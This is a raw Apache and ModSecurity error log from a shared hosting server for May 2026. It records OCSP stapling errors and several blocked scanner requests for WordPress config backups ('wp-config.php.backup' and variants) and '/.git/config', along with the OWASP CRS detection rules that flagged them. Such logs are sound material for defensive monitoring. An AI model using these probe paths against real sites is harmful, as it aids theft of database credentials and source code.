[Mon May 11 15:33:47.207656 2026] [ssl:error] [pid 1319886:tid 1319926] (EAI 2)Name or service not known: [client 125.209.235.180:49663] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 15:33:47.208261 2026] [ssl:error] [pid 1319886:tid 1319926] AH01941: stapling_renew_response: responder error
[Mon May 11 15:33:48.734974 2026] [authz_core:error] [pid 1320674:tid 1320700] [client 17.246.19.16:43448] AH01630: client denied by server configuration: /home/jeanboya/public_html/wp-includes/SimplePie/library/error_log
[Mon May 11 15:33:50.530244 2026] [ssl:error] [pid 1319886:tid 1319899] (EAI 2)Name or service not known: [client 110.93.150.86:60373] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 15:33:50.530287 2026] [ssl:error] [pid 1319886:tid 1319899] AH01941: stapling_renew_response: responder error
[Mon May 11 15:34:02.085538 2026] [ssl:error] [pid 1319953:tid 1319961] (EAI 2)Name or service not known: [client 64.62.156.202:47484] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 15:34:02.085585 2026] [ssl:error] [pid 1319953:tid 1319961] AH01941: stapling_renew_response: responder error
[Mon May 11 15:34:40.312787 2026] [security2:error] [pid 1319953:tid 1319958] [client 45.133.170.106:60443] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agHa8OSQ-m-m0ukSShuE7wAAAUM"], referer: https://www.piregwan-genesis.com/
[Mon May 11 15:35:43.411449 2026] [authz_core:error] [pid 1319885:tid 1319890] [client 47.128.58.54:48698] AH01630: client denied by server configuration: /home/krakouka/public_html/wp-includes/sodium_compat/src/error_log
[Mon May 11 15:36:22.411243 2026] [ssl:error] [pid 1320398:tid 1320412] (EAI 2)Name or service not known: [client 41.248.180.0:58372] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 15:36:22.411677 2026] [ssl:error] [pid 1320398:tid 1320412] AH01941: stapling_renew_response: responder error
[Mon May 11 15:36:39.682092 2026] [ssl:error] [pid 1319953:tid 1319970] (EAI 2)Name or service not known: [client 64.62.156.209:21829] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 15:36:39.682213 2026] [ssl:error] [pid 1319953:tid 1319970] AH01941: stapling_renew_response: responder error
[Mon May 11 15:36:39.692355 2026] [security2:error] [pid 1320398:tid 1320407] [client 43.134.40.189:41036] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "apoe.fr"] [uri "/"] [unique_id "agHbZ-JEyNRN152ArOSQyQAAAEc"], referer: http://apoe.fr
[Mon May 11 15:36:40.119573 2026] [security2:error] [pid 1319885:tid 1319920] [client 184.73.195.18:20530] ModSecurity: Warning. Pattern match "(?:<\\\\?(?!xml\\\\s)|<\\\\?php|\\\\[(?:/|\\\\\\\\)?php\\\\])" at ARGS_NAMES:php echo BASEFRONT ?>img/formation/video/miniature/<?php echo $image ?>. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "41"] [id "933100"] [msg "PHP Injection Attack: PHP Open Tag Found"] [data "Matched Data: <? found within ARGS_NAMES:php echo BASEFRONT ?>img/formation/video/miniature/<?php echo $image ?>: php echo basefront ?>img/formation/video/miniature/<?php echo $image ?>"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "www.missmandarine.com"] [uri "/js/lightbox/<"] [unique_id "agHbaFchVQ3tCn0m9OpcBgAAARE"]
[Mon May 11 15:36:40.120479 2026] [security2:error] [pid 1319885:tid 1319920] [client 184.73.195.18:20530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.missmandarine.com"] [uri "/js/lightbox/<"] [unique_id "agHbaFchVQ3tCn0m9OpcBgAAARE"]
[Mon May 11 15:36:40.229466 2026] [security2:error] [pid 1319885:tid 1319920] [client 184.73.195.18:20530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): PHP Injection Attack: PHP Open Tag Found"] [tag "event-correlation"] [hostname "www.missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agHbaFchVQ3tCn0m9OpcBgAAARE"]
[Mon May 11 15:38:00.613041 2026] [proxy:error] [pid 1319998:tid 1320006] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2090 (127.0.0.1:2090) failed
[Mon May 11 15:38:00.615839 2026] [proxy_http:error] [pid 1319998:tid 1320006] [client 31.32.194.37:46315] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Mon May 11 15:38:00.768981 2026] [security2:error] [pid 1319885:tid 1319896] [client 31.32.194.37:25103] ModSecurity: Warning. Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "440"] [id "920420"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/vnd.ms-sync.wbxml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "mail.nearoo.fr"] [uri "/___proxy_activesync/"] [unique_id "agHbuFchVQ3tCn0m9OpccQAAAQc"]
[Mon May 11 15:38:00.772274 2026] [security2:error] [pid 1319885:tid 1319896] [client 31.32.194.37:25103] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.nearoo.fr"] [uri "/___proxy_activesync/"] [unique_id "agHbuFchVQ3tCn0m9OpccQAAAQc"]
[Mon May 11 15:38:00.772882 2026] [security2:error] [pid 1319885:tid 1319896] [client 31.32.194.37:25103] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Request content type is not allowed by policy"] [tag "event-correlation"] [hostname "mail.nearoo.fr"] [uri "/___proxy_activesync/"] [unique_id "agHbuFchVQ3tCn0m9OpccQAAAQc"]
[Mon May 11 15:38:01.164850 2026] [proxy:error] [pid 1319885:tid 1319896] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2090 (127.0.0.1:2090) failed
[Mon May 11 15:38:01.165182 2026] [proxy_http:error] [pid 1319885:tid 1319896] [client 31.32.194.37:25103] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Mon May 11 15:38:08.262919 2026] [security2:error] [pid 1319953:tid 1319969] [client 172.212.217.10:12772] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "groupe-habilis.fr"] [uri "/wp-config.php.backup"] [unique_id "agHbwOSQ-m-m0ukSShuF0AAAAU4"]
[Mon May 11 15:38:08.263082 2026] [security2:error] [pid 1319953:tid 1319969] [client 172.212.217.10:12772] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "groupe-habilis.fr"] [uri "/wp-config.php.backup"] [unique_id "agHbwOSQ-m-m0ukSShuF0AAAAU4"]
[Mon May 11 15:38:08.263304 2026] [security2:error] [pid 1319953:tid 1319969] [client 172.212.217.10:12772] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "groupe-habilis.fr"] [uri "/403.shtml"] [unique_id "agHbwOSQ-m-m0ukSShuF0AAAAU4"]
[Mon May 11 15:38:14.733181 2026] [security2:error] [pid 1319953:tid 1319969] [client 172.212.217.10:12772] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /backup.wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "groupe-habilis.fr"] [uri "/backup.wp-config.php"] [unique_id "agHbxuSQ-m-m0ukSShuF9QAAAU4"]
[Mon May 11 15:38:14.734125 2026] [security2:error] [pid 1319953:tid 1319969] [client 172.212.217.10:12772] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "groupe-habilis.fr"] [uri "/backup.wp-config.php"] [unique_id "agHbxuSQ-m-m0ukSShuF9QAAAU4"]
[Mon May 11 15:38:14.734363 2026] [security2:error] [pid 1319953:tid 1319969] [client 172.212.217.10:12772] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "groupe-habilis.fr"] [uri "/403.shtml"] [unique_id "agHbxuSQ-m-m0ukSShuF9QAAAU4"]
[Mon May 11 15:38:23.143427 2026] [security2:error] [pid 1319953:tid 1319969] [client 172.212.217.10:12772] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /new-wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "groupe-habilis.fr"] [uri "/new-wp-config.php"] [unique_id "agHbz-SQ-m-m0ukSShuGMQAAAU4"]
[Mon May 11 15:38:23.143591 2026] [security2:error] [pid 1319953:tid 1319969] [client 172.212.217.10:12772] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "groupe-habilis.fr"] [uri "/new-wp-config.php"] [unique_id "agHbz-SQ-m-m0ukSShuGMQAAAU4"]
[Mon May 11 15:38:23.143796 2026] [security2:error] [pid 1319953:tid 1319969] [client 172.212.217.10:12772] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "groupe-habilis.fr"] [uri "/403.shtml"] [unique_id "agHbz-SQ-m-m0ukSShuGMQAAAU4"]
[Mon May 11 15:38:28.502750 2026] [security2:error] [pid 1319998:tid 1320001] [client 170.106.73.216:51838] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.castiglionecorporatefinance.fr"] [uri "/"] [unique_id "agHb1Kt2WtvoFr7xvGzYcwAAAIE"]
[Mon May 11 15:38:28.761408 2026] [security2:error] [pid 1320674:tid 1320713] [client 34.91.71.176:40494] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.crm.rentparadise.fr"] [uri "/.git/config"] [unique_id "agHb1KO9RdIr1DwxYR2YWgAAANg"]
[Mon May 11 15:38:28.761726 2026] [security2:error] [pid 1320674:tid 1320713] [client 34.91.71.176:40494] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.crm.rentparadise.fr"] [uri "/.git/config"] [unique_id "agHb1KO9RdIr1DwxYR2YWgAAANg"]
[Mon May 11 15:38:28.764469 2026] [core:error] [pid 1320674:tid 1320713] [client 34.91.71.176:40494] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 15:38:28.767460 2026] [security2:error] [pid 1320674:tid 1320713] [client 34.91.71.176:40494] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.crm.rentparadise.fr"] [uri "/index.php"] [unique_id "agHb1KO9RdIr1DwxYR2YWgAAANg"]
[Mon May 11 15:38:29.468505 2026] [security2:error] [pid 1319998:tid 1320002] [client 49.51.141.76:51156] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "moncampingcarenligne.com"] [uri "/"] [unique_id "agHb1at2WtvoFr7xvGzYdAAAAII"]
[Mon May 11 15:38:30.612978 2026] [security2:error] [pid 1319953:tid 1319967] [client 170.106.73.216:48710] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.castiglionecorporatefinance.fr"] [uri "/"] [unique_id "agHb1uSQ-m-m0ukSShuGPQAAAUw"], referer: http://www.castiglionecorporatefinance.fr
[Mon May 11 15:38:49.666210 2026] [ssl:error] [pid 1320674:tid 1320703] (EAI 2)Name or service not known: [client 64.62.156.204:8451] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 15:38:49.666372 2026] [ssl:error] [pid 1320674:tid 1320703] AH01941: stapling_renew_response: responder error
[Mon May 11 15:39:17.255005 2026] [ssl:error] [pid 1319998:tid 1320003] (EAI 2)Name or service not known: [client 51.68.107.138:23203] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 15:39:17.255672 2026] [ssl:error] [pid 1319998:tid 1320003] AH01941: stapling_renew_response: responder error
[Mon May 11 15:39:17.271721 2026] [security2:error] [pid 1320674:tid 1320703] [client 43.156.109.53:50668] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.tchatbooster.com"] [uri "/"] [unique_id "agHcBaO9RdIr1DwxYR2Y5gAAAM4"]
[Mon May 11 15:39:20.179740 2026] [security2:error] [pid 1319886:tid 1319924] [client 43.156.109.53:37424] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.tchatbooster.com"] [uri "/"] [unique_id "agHcCKy-5-wpj6Sx56aeZgAAABA"], referer: http://www.tchatbooster.com
[Mon May 11 15:39:24.896130 2026] [ssl:error] [pid 1319953:tid 1319974] (EAI 2)Name or service not known: [client 64.62.156.205:52775] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 15:39:24.896188 2026] [ssl:error] [pid 1319953:tid 1319974] AH01941: stapling_renew_response: responder error
[Mon May 11 15:39:45.241489 2026] [security2:error] [pid 1319885:tid 1319915] [client 209.38.97.4:34560] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ixinabourgoin.fr"] [uri "/.git/config"] [unique_id "agHcIVchVQ3tCn0m9OpdLgAAAQ8"]
[Mon May 11 15:39:45.241830 2026] [security2:error] [pid 1319885:tid 1319915] [client 209.38.97.4:34560] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/.git/config"] [unique_id "agHcIVchVQ3tCn0m9OpdLgAAAQ8"]
[Mon May 11 15:39:45.242686 2026] [security2:error] [pid 1319885:tid 1319915] [client 209.38.97.4:34560] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/.git/config"] [unique_id "agHcIVchVQ3tCn0m9OpdLgAAAQ8"]
[Mon May 11 15:39:45.425764 2026] [security2:error] [pid 1319953:tid 1319976] [client 209.38.97.4:55918] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ixinabourgoin.fr"] [uri "/.git/config"] [unique_id "agHcIeSQ-m-m0ukSShuGiwAAAVU"]
[Mon May 11 15:39:45.425960 2026] [security2:error] [pid 1319953:tid 1319976] [client 209.38.97.4:55918] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/.git/config"] [unique_id "agHcIeSQ-m-m0ukSShuGiwAAAVU"]
[Mon May 11 15:39:45.426192 2026] [security2:error] [pid 1319953:tid 1319976] [client 209.38.97.4:55918] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/.git/config"] [unique_id "agHcIeSQ-m-m0ukSShuGiwAAAVU"]
[Mon May 11 15:40:24.570782 2026] [authz_core:error] [pid 1319885:tid 1319900] [client 216.73.216.110:53148] AH01630: client denied by server configuration: /home/missmand/public_html/missmandarine.ch/learning/old/main/coursecopy/classes/error_log
[Mon May 11 15:40:25.212321 2026] [security2:error] [pid 1320398:tid 1320418] [client 43.157.170.13:37602] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "pole-de-mobilite-regional.com"] [uri "/"] [unique_id "agHcSeJEyNRN152ArOSRvwAAAFI"]
